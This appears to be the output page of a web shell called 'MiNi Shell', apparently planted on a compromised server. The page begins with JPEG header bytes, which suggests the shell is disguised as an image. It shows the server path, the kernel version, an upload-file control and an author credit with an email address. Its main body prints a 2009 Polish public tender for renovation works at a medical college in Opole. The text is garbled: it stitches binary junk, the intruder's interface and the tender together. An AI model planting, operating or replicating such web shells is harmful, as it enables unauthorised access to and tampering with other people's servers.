JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090702/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090702/104379-N-2009.html

<p class="kh_header"><b>Opole: Przetarg nieograniczony na roboty budowlane w zakresie remontu - przebudowy ośmiokondygnacyjnego budynku (/Dom Studenta/) oraz remontu budynku (Pawilon dydaktyczny) Państwowej Medycznej Wyższej Szkoły Zawodowej w Opolu (nr sprawy: OPZ-381-2/09)</b><br>
<b>Numer ogłoszenia: 104379 - 2009; data zamieszczenia: 02.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Medyczna Wyższa Szkoła Zawodowa w Opolu , ul. Katowicka 68, 45-060 Opole, woj. opolskie, tel. 077 4423524, 4423520, faks 077 4423517.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wsm.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na roboty budowlane w zakresie remontu - przebudowy ośmiokondygnacyjnego budynku (/Dom Studenta/) oraz remontu budynku (Pawilon dydaktyczny) Państwowej Medycznej Wyższej Szkoły Zawodowej w Opolu (nr sprawy: OPZ-381-2/09).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane (przebudowa i remont) połączonych ze sobą przejściem budynku /Domu Studenta/ (tj. budynek 8 - kondygnacyjny) i budynku /Pawilon dydaktyczny/, polegające na zadaniu:
a).Remont obiektu /budynek 8-kondygnacyjny/. - Montaż drzwi antywłamaniowych w tajnej kancelarii.  
(Polega to na zamontowaniu drzwi antywłamaniowych w przedsionku kancelarii tajnej. - Zamontowana ościeżnica i skrzydło drzwiowe, jako wbudowana całość musi spełniać wymagania stawiane drzwiom klasy C). 
Szczegółowy opis przedmiotu zamówienia do lit. a stanowi: opis zakresu robót z książki przedmiaru robót będącego załącznikiem nr 5 do SIWZ oraz Specyfikacja techniczna wykonania i odbioru robót jako załącznik nr 6 do SIWZ.
b).Remont obiektu /budynek 8-kondygnacyjny/. - Wymiana okien i drzwi balkonowych Domu Studenta. 
(Polega na wymianie okien i drzwi balkonowych w pokojach akademika - Jest to część mieszkalna budynku. Ogólny zakres robót: 
- demontaż okien i drzwi balkonowych; 
- demontaż parapetów zewnętrznych z blachy ocynkowanej; 
- demontaż parapetów wewnętrznych z lastriko; 
- montaż drzwi i okien balkonowych (kotwy, taśma rozprężna uszczelniająca, pianka poliuretanowa listwa przyparapetowa) z PCV o współczynniku U dla całego okna < 1,5; każde okno należy wyposażyć w nawiewnik higrosterowny, a do wszystkich okien i drzwi balkonowych zamontować rolety tekstylne. Okna dwuskrzydłowe R+U, drzwi z poziomą poprzeczką. UWAGA: układ i wymiary okien i drzwi należy dostosować i wykonać jak w pomieszczeniach na VII p.;
- montaż parapetów zewnętrznych z aluminium powlekanego w kolorze białym;
- montaż parapetów wewnętrznych z konglomeratu;
- uzupełnienie tynków i izolacji cieplnej zewnętrznej - tynk akrylowy w kolorze elewacji;
- uzupełnienie tynków i malowania wewnętrznego w kolorze ścian pokoju;
- wywóz gruzu.)
Szczegółowy opis zamówienia do lit. b stanowi: opis zakresu robót z książki przedmiaru robót będącego załącznikiem nr 8 do SIWZ oraz Specyfikacja techniczna wykonania i odbioru robót jako załącznik nr 9 do SIWZ.
c). Remont obiektu /Pawilon dydaktyczny/. - Wymiana i naprawa posadzki Rektoratu (pokoje Rektorów, Sala Senatu, sekretariat).  Polega to na wymianie wykładziny w pomieszczeniach Rektoratu i ułożenie nowej wykładziny obiektowej. Ogólny zakres robót obejmuje: rozbiórkę starej wykładziny, naprawę i przygotowanie podłoża, ułożenie nowej wykładziny, uzupełnienia tynków i powłok malarskich w miejscach po wymianie listew przypodłogowych. 
Szczegółowy opis przedmiotu zamówienia do lit. c stanowi: opis zakresu robót z książki przedmiaru robót jako załącznik nr 11 do SIWZ oraz Specyfikacja techniczna wykonania i odbioru robót będącego załącznikiem nr 12 do SIWZ.
d). Remont obiektu /budynek 8 - kondygnacyjny/. - Remont głównych rozdzielaczy c.o. i c.w.u. z remontem pomieszczeń węzła cieplnego. (Ogólny zakres remontu: wymiana zaworów, manometru, rozdzielacza, izolacja termiczna rurociągów, malowanie instalacji i osprzętu, przetarcie i malowanie tynków pomieszczenia).
Szczegółowy opis przedmiotu zamówienia do lit.d stanowi: opis zakresu robót z książki przedmiaru robót będącego załącznikiem nr 14 do SIWZ oraz Specyfikacja techniczna wykonania i odbioru robót jako załącznik nr 15 do SIWZ.
e). Przebudowa obiektu /budynek 8 - kondygnacyjny/. - Zabezpieczenie p.poż. przepustów i wentylacji mechanicznej. 
- w części mieszkalnej budynku  (Ogólny zakres robót: wykonanie zabezpieczeń p.poż. przepustów instalacyjnych, wentylacyjnych w budynku 8- kondygnacyjnym zgodnie z warunkami podziału obiektów uczelni na strefy pożarowe); 
- w części niemieszkalnej budynku (Ogólny zakres robót: wykonanie zabezpieczeń p.poż. przepustów instalacyjnych, wentylacyjnych w budynku 8- kondygnacyjnym zgodnie z warunkami podziału obiektów uczelni na strefy pożarowe). 
Szczegółowy opis przedmiotu zamówienia do lit. e stanowi: opis zakresu robót z książki przedmiaru robót będącego załącznikiem nr 17 do SIWZ dla części mieszkalnej budynku, a dla części niemieszkalnej budynku będącego załącznikiem nr 26 do SIWZ; Specyfikacja techniczna wykonania i odbioru robót jest identyczna w swym opisie dla części mieszkalnej i mieszkalnej stanowiąc załącznik nr 18 do SIWZ; projekt budowlany przedstawia część mieszkalną oraz część niemieszkalną jako załącznik nr 24 do SIWZ; załącznik nr 27 do SIWZ dodatkowy opis do załącznik nr 17 i 26.
Dodatkowo, dla prawidłowości wykonania zadań (w części mieszkalnej oraz niemieszkalnej) Zamawiający zawarł w SIWZ jako załącznik nr 25 pomocniczą charakterystykę pożarową budynków będącą opisem technicznym dotyczącym zabezpieczenia p-poż obiektów Zamawiającego. - Charakterystyka ta może być użyteczna dla Wykonawcy przy doborze przepustów..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.44.00-4, 45.43.21.11-5, 45.34.31.00-4, 45.33.12.00-8, 45.42.11.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawca, który biega się o zamówienie, musi spełnić łącznie następujące warunki, dopuszczone i zawarte w ustawie Prawo Zamówień Publicznych z dnia 29.01.2004r., tzn. wykonawca :
1.).oświadczy, że spełnia warunek określony:
1.1.).w art.22 ust.1 pkt.2 ustawy Prawo Zamówień Publicznych lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
1.2).w art.22 ust.1 pkt.3 ustawy Prawo Zamówień Publicznych;
1.3).w art.22 ust.1 pkt.4 ustawy Prawo Zamówień Publicznych.
2).dla potwierdzenia złożonego oświadczenia wykaże, iż posiada wiedzę i doświadczenie oraz dysponuje osobami zdolnymi do wykonania zamówienia, tzn. jako wykonawca lub podwykonawca, wykaże, iż w okresie ostatnich 5 lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował,:
a).dla składanej oferty częściowej nr II, - co najmniej jedno zamówienie które przekroczyło wartość 80.000,00 PLN z podatkiem VAT odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia (tj. roboty budowlane w zakresie obiektów budowlanych), potwierdzone kopią protokołu końcowego odbioru robót lub referencjami.
b).dla składanej oferty częściowej nr V, - co najmniej jedno zamówienie które przekroczyło wartość 100.000,00 PLN z podatkiem VAT odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia (tj. roboty budowlane w zakresie przeciwpożarowym obiektów budowlanych), potwierdzone kopią protokołu końcowego odbioru robót lub referencjami.
3).dla wykazania, iż nie podlega wykluczeniu na odstawie art.24 ustawy Prawo Zamówień Publicznych, dołączy dokument określony w pkt.1 lit.e pola [Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu].
4).Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły /spełnia - nie spełnia/, w oparciu o informacje zawarte w dokumentach wyszczególnionych w punkcie nr 1 pola [Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu]. Z treści wymaganych oświadczeń i dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił.
5).Przy ocenie spełniania warunków udziału w postępowaniu przez wykonawców ubiegających się wspólnie o udzielenie zamówienia: 
a).w odniesieniu do wymagań postawionych przez Zamawiającego w pkt. 1 pola [Opis warunków udziału w postępowaniu (z uwzględnieniem ich znaczenia, jeżeli dotyczy) oraz opis sposobu dokonywania oceny spełniania tych warunków]: 
- oświadczenie z art. 22 ust.1 pkt.2-3 ustawy PZP może być złożone łącznie przez wszystkich uczestników wspólnie ubiegających się o zamówienie.
- oświadczenie z art. 22 ust.1 pkt. 4 PZP musi być złożone oddzielnie przez każdego z wykonawców wspólnie ubiegającego się o udzielnie zamówienia. 
b).w odniesieniu do wymagań postawionych przez Zamawiającego w pkt. 2 pola [Opis warunków udziału w postępowaniu (z uwzględnieniem ich znaczenia, jeżeli dotyczy) oraz opis sposobu dokonywania oceny spełniania tych warunków], to dokumenty określone w pkt.1 lit d pola [Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu], mogą być złożone wspólnie przez wszystkich uczestników wspólnie ubiegających się o zamówienie,. - Badanie warunków spełniania w przypadku pkt. 2 pola [Opis warunków udziału w postępowaniu (z uwzględnieniem ich znaczenia, jeżeli dotyczy) oraz opis sposobu dokonywania oceny spełniania tych warunków] będą badane łącznie dla całej grupy wykonawców wspólnie ubiegających się o zamówienie.
c).w odniesieniu do wymagań postawionych przez Zamawiającego w pkt. 3 pola [Opis warunków udziału w postępowaniu (z uwzględnieniem ich znaczenia, jeżeli dotyczy) oraz opis sposobu dokonywania oceny spełniania tych warunków], każdy z wykonawców wspólnie ubiegających się o udzielnie zamówienia musi oddzielnie złożyć dokumenty określone w pkt.1 lit e pola [Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu], wykazując nimi, iż nie podlega wykluczeniu na podstawie art.24 ustawy Prawo Zamówień Publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1).Wymagane dokumenty od wykonawcy
a).dla wymogu z pkt.1.1 pola [Opis warunków udziału w postępowaniu (z uwzględnieniem ich znaczenia, jeżeli dotyczy) oraz opis sposobu dokonywania oceny spełniania tych warunków], oświadczenie o spełnianiu warunków, o których mowa w art.22 ust. l  pkt.2 ustawy Prawo Zamówień Publicznych (wg wzoru stanowiącego załącznik nr 3 do SIWZ) lub  pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
b).dla wymogu z pkt.1.2 pola [Opis warunków udziału w postępowaniu (z uwzględnieniem ich znaczenia, jeżeli dotyczy) oraz opis sposobu dokonywania oceny spełniania tych warunków], oświadczenie o spełnianiu warunków, o których mowa w art.22 ust. l pkt.3 ustawy Prawo Zamówień Publicznych (wg wzoru stanowiącego załącznik nr 7 do SIWZ);
c).dla wymogu z pkt.1.3 pola [Opis warunków udziału w postępowaniu (z uwzględnieniem ich znaczenia, jeżeli dotyczy) oraz opis sposobu dokonywania oceny spełniania tych warunków], oświadczenie o spełnianiu warunków, o których mowa w art.22 ust. l  pkt.4 ustawy Prawo Zamówień Publicznych (wg wzoru stanowiącego załącznik nr 10 do SIWZ);
d).dla spełnienia wymogów z pkt.2 pola [Opis warunków udziału w postępowaniu (z uwzględnieniem ich znaczenia, jeżeli dotyczy) oraz opis sposobu dokonywania oceny spełniania tych warunków] - wykonawca dostarczy wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielnie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. - Wykaz winien posiadać dane uwzględnione w załączniku nr 4 do SIWZ. 
e).dla wymogu z pkt.3 pola [Opis warunków udziału w postępowaniu (z uwzględnieniem ich znaczenia, jeżeli dotyczy) oraz opis sposobu dokonywania oceny spełniania tych warunków], aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
f).jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych w pkt.1 lit.e pola [Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu], - stosuje się dokumenty określone §2 rozporządzenia Prezesa Rady Ministrów w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane. (Dz. U. 2006 r., Nr 87, poz.605 z póź. zm.)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.wsm.opole.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Medyczna Wyższa Szkoła Zawodowa w Opolu, ul. Katowicka 68, pokój 105, I piętro..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2009 godzina 10:00, miejsce: Państwowa Medyczna Wyższa Szkoła Zawodowa w Opolu, ul. Katowicka 68, pokój 102, I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont obiektu /budynek 8-kondygnacyjny/. - Montaż drzwi antywłamaniowych w tajnej kancelarii..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Polega to na zamontowaniu drzwi antywłamaniowych w przedsionku kancelarii tajnej. - Zamontowana ościeżnica i skrzydło drzwiowe, jako wbudowana całość musi spełniać wymagania stawiane drzwiom klasy C. 
Szczegółowy opis przedmiotu zamówienia stanowi: opis zakresu robót z książki przedmiaru robót będącego załącznikiem nr 5 do SIWZ oraz Specyfikacja techniczna wykonania i odbioru robót jako załącznik nr 6 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.10-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont obiektu /budynek 8-kondygnacyjny/. - Wymiana okien i drzwi balkonowych Domu Studenta.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Polega na wymianie okien i drzwi balkonowych w pokojach akademika - Jest to część mieszkalna budynku. Ogólny zakres robót: 
-demontaż okien i drzwi balkonowych; 
-demontaż parapetów zewnętrznych z blachy ocynkowanej; 
-demontaż parapetów wewnętrznych z lastriko; 
-montaż drzwi i okien balkonowych (kotwy, taśma rozprężna uszczelniająca, pianka poliuretanowa listwa przyparapetowa) z PCV o współczynniku U dla całego okna < 1,5; każde okno należy wyposażyć w nawiewnik higrosterowny, a do wszystkich okien i drzwi balkonowych zamontować rolety tekstylne. Okna dwuskrzydłowe R+U, drzwi z poziomą poprzeczką. UWAGA: układ i wymiary okien i drzwi należy dostosować i wykonać jak w pomieszczeniach na VII p.;
-montaż parapetów zewnętrznych z aluminium powlekanego w kolorze białym;
-montaż parapetów wewnętrznych z konglomeratu;
-uzupełnienie tynków i izolacji cieplnej zewnętrznej - tynk akrylowy w kolorze elewacji;
-uzupełnienie tynków i malowania wewnętrznego w kolorze ścian pokoju;
-wywóz gruzu.)
Szczegółowy opis zamówienia stanowi: opis zakresu robót z książki przedmiaru robót będącego załącznikiem nr 8 do SIWZ oraz Specyfikacja techniczna wykonania i odbioru robót jako załącznik nr 9 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont obiektu /Pawilon dydaktyczny/. - Wymiana i naprawa posadzki Rektoratu (pokoje Rektorów, Sala Senatu, sekretariat)..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Polega to na wymianie wykładziny w pomieszczeniach Rektoratu i ułożenie nowej wykładziny obiektowej. Ogólny zakres robót obejmuje: rozbiórkę starej wykładziny, naprawę i przygotowanie podłoża, ułożenie nowej wykładziny, uzupełnienia tynków i powłok malarskich w miejscach po wymianie listew przypodłogowych. 
Szczegółowy opis przedmiotu zamówienia stanowi: opis zakresu robót z książki przedmiaru robót jako załącznik nr 11 do SIWZ oraz Specyfikacja techniczna wykonania i odbioru robót będącego załącznikiem nr 12 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.43.21.11-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Remont obiektu /budynek 8 - kondygnacyjny/. - Remont głównych rozdzielaczy c.o. i c.w.u. z remontem pomieszczeń węzła cieplnego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ogólny zakres remontu: wymiana zaworów, manometru, rozdzielacza, izolacja termiczna rurociągów, malowanie instalacji i osprzętu, przetarcie i malowanie tynków pomieszczenia.
Szczegółowy opis przedmiotu zamówienia stanowi: opis zakresu robót z książki przedmiaru robót będącego załącznikiem nr 14 do SIWZ oraz Specyfikacja techniczna wykonania i odbioru robót jako załącznik nr 15 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.12.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przebudowa obiektu /budynek 8 - kondygnacyjny/. - Zabezpieczenie p.poż. przepustów i wentylacji mechanicznej..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - w części mieszkalnej budynku  (Ogólny zakres robót: wykonanie zabezpieczeń p.poż. przepustów instalacyjnych, wentylacyjnych w budynku 8- kondygnacyjnym zgodnie z warunkami podziału obiektów uczelni na strefy pożarowe); 
- w części niemieszkalnej budynku (Ogólny zakres robót: wykonanie zabezpieczeń p.poż. przepustów instalacyjnych, wentylacyjnych w budynku 8- kondygnacyjnym zgodnie z warunkami podziału obiektów uczelni na strefy pożarowe). 
Szczegółowy opis przedmiotu zamówienia stanowi: opis zakresu robót z książki przedmiaru robót będącego załącznikiem nr 17 do SIWZ dla części mieszkalnej budynku, a dla części niemieszkalnej budynku będącego załącznikiem nr 26 do SIWZ; Specyfikacja techniczna wykonania i odbioru robót jest identyczna w swym opisie dla części mieszkalnej i mieszkalnej stanowiąc załącznik nr 18 do SIWZ; projekt budowlany przedstawia część mieszkalną oraz część niemieszkalną jako załącznik nr 24 do SIWZ; załącznik nr 27 do SIWZ dodatkowy opis do załącznik nr 17 i 26.
Dodatkowo, dla prawidłowości wykonania zadań (w części mieszkalnej oraz niemieszkalnej) Zamawiający zawarł w SIWZ jako załącznik nr 25 pomocniczą charakterystykę pożarową budynków będącą opisem technicznym dotyczącym zabezpieczenia p-poż obiektów Zamawiającego. - Charakterystyka ta może być użyteczna dla Wykonawcy przy doborze przepustów..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.34.31.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com